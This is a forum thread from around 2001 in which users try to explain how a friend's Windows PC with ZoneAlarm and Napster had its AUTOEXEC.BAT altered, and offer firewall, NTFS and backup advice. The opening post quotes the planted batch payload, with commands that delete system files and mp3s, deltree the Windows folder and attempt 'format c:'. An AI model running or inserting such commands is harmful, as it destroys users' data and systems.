Hacking through a firewall?

[joelen]

I have an unusual situaion.

Have a friend that has internet access through cable. They use zonealarm for their firewall, Norton anti virus 2001 (updated very regularly) but they still have been 'hacked' several times.

The most recent issue that happened, is their AUTOEXEC.BAT file was modified, with some really fun things added to it:

YOU ARE F**KED!!! NEXT TIME SHARE!!!!!!

echo off
del c:\windows\system\*.exe
del c:\windows\system\*.dll
del *.mp3 /s
deltree c:\windows


Needless to say, they rebooted their computer for some reason, and it don't work too well anymore.

all the exe and dll files were removed from windows\system, and as you can tell, it looks like there was an attempt to remove all mp3 files from the system, but it was done incorrectly- so it did not. We can still rescue all the mp3's. Then there was the attempt to remove the the windows directory intirely, fortunatly they had the common sense to say "NO" when they were asked for permission to do that!

Pretty basic, pretty slick, but HOW DID THIS HAPPEN?

They are using napster of course, and they did stop several people from downloading from them the other day, but how was someone able to access the autoexec file and change it? They do not have ANY other filesharing type apps installed-- just napster.

Also, no one there has the knowledge to do this on their own, and no one else has used their pc-- they have not had any floppies in etc.

This is the 2nd time their autoexec has been 'hacked' - last time it was just a simple "format c:" attempt, but with no echo off, no switches- so they said 'no' and prevented disater.... thing is, after that, i made the autoexec READ ONLY (it ws still READ ONLY when i checked it...)

(they also got a boot sector virus that norton detected but could not clean, i think they were running with the firewall down on that one....)

Any ideas?

[Web Master]

You sure it's not that MP3 virus, it sounds very similar. It is a 8041 Byte MP3 files. It was talked about on TechTV a month or so ago.

[joelen]

Anyone have any more info on that virus? I cannot find any information on it anywhere.....

[Sorry_I_Win]

Just because they have a firewall does not mean that they are protected. I personally do not like ZoneAlarm because you do not have enought control over it (well at least the version I tried a while ago). Make sure you do not have any ports open to the public. Get a good firewall like AtGaurd that allows rules for individual apps and ports. It allows allows u to view active connections (so u can see when a hacker has connected to your machine).

By the way, you are lucky that the people getting access to that machine are not real hackers. You can tell from their attemps that they are not very knowledgable. A real hacker could have totally destroyed that machine (very easily, I might add).

[tha 4NiK8R]

with the boot sector virus you need to boot up with an anti-vuris floppy disk. You can create one in Norton or download AVG(www.grisoft.com) and make one. For the hacked part: use a better firewall and make sure all ports are closed. You should also be running a more secure OS like Win2k so you have the added protection of NTFS, etc. I also prefer to have my system partition to be an odd letter(ie E to keep out the newbie hackers. The only real way to keep people out of a system is to shut it off(hehe), but seriously to keep the lamers out you just need to use the tools(firewall, NTFS, permissions, etc) you have correctly.

[joelen]

By the way, you are lucky that the people getting access to that machine are not real hackers. You can tell from their attemps that they are not very knowledgable. A real hacker could have totally destroyed that machine (very easily, I might add).[/B]

I AGREE!!! Even with a little surfing the intenet they could come up with some more damaging things to do...

As for zonealarm, it does allow control of different apps, and i am wiondering if becuase they gave permission for napster to use internet, both ways, that this is where they are getting in? I must admit, i am not really knowledgable on how all this is done-- i really don't understand how someone was able to edit a readonly file!

I would like to nkow how this was possible, mainly so i can do what ever i need to do to prevent it from happening again.......

[joelen]

Originally posted by tha 4NiK8R:
You should also be running a more secure OS like Win2k so you have the added protection of NTFS, etc.

Yeah-- i thought of win2k for the NTFS-- thing is that it is a little too much for them, plus they are avid gamers.... have had too many people tell me that win2k is not the best for gaming....

[Sorry_I_Win]

Originally posted by joelen:
i really don't understand how someone was able to edit a readonly file!

I would like to nkow how this was possible, mainly so i can do what ever i need to do to prevent it from happening again.......

It is quite easy to edit a read-only file. Remove read-only permission, edit the file then reset read-only.

Simple DOS commands will do the trick:

attrib c:\autoexec.bat -r -s -h
edit c:\autoexec.bat
attrib c:\autoexec.bat +r

or from windows:

rick-click file - goto properties, uncheck readonly

[MacGyver]

Have you checked their protocol bindings in Network properties? You can have all the protection you want, but if you have NetBEUI bound to your internet adapter, you're leaving the back door wide open. Go to www.grc.com and test the computer with ShieldsUP - this will let you know if there is something wrong right away.

And as I always say, there is no substitute for regular backups, because you never know when something like this will happen.

[rscos]

Originally posted by joelen:
Yeah-- i thought of win2k for the NTFS-- thing is that it is a little too much for them, plus they are avid gamers.... have had too many people tell me that win2k is not the best for gaming....

Although i don't run win2k at home (yet), I have heard several people say that it's better at OpenGL games than Win9x. He may have been wrong though. In fact, thinking about it, I'll just shut up now....

[joelen]

Originally posted by MacGyver:
Have you checked their protocol bindings in Network properties?

Only thing bound to the NIC is tcp/ip and client for ms networks...

also: checked with grc.com running in 'stealth mode'

Is it possible that allowing napster to share files is allowing full access to the system somehow?

[shadow1]

Zone alarm asks if you want certain programs to act as server. If yes was answered there is an open port all the time the box is on. Open up zone alarm and check to see if napster is set as a server.

[MacGyver]

Well I have never used Napster so I wouldn't know. But I have used Gnotella and Bearshare and others are only able to download off you, they are not able to send any files to you. There may be an option somewhere in Napster that needs to be set properly. There may be viruses that spread through Napster, I know there are ones that spread through the Gnutella network. Do a file search on the PC for *.vbs, there may have been something come in through email that is haunting them....

[Imon Fyre]

Originally posted by MacGyver:
Do a file search on the PC for *.vbs, there may have been something come in through email that is haunting them....

which is impossible for ppl who are running ME, because the search function does not seem to work!!!!!!!!!

[Sowulo]

Originally posted by Imon Fyre:
which is impossible for ppl who are running ME, because the search function does not seem to work!!!!!!!!!

Double check your ME install. I've never seen your problem and just double checked on my own ME box over in the Tech Room--no problem...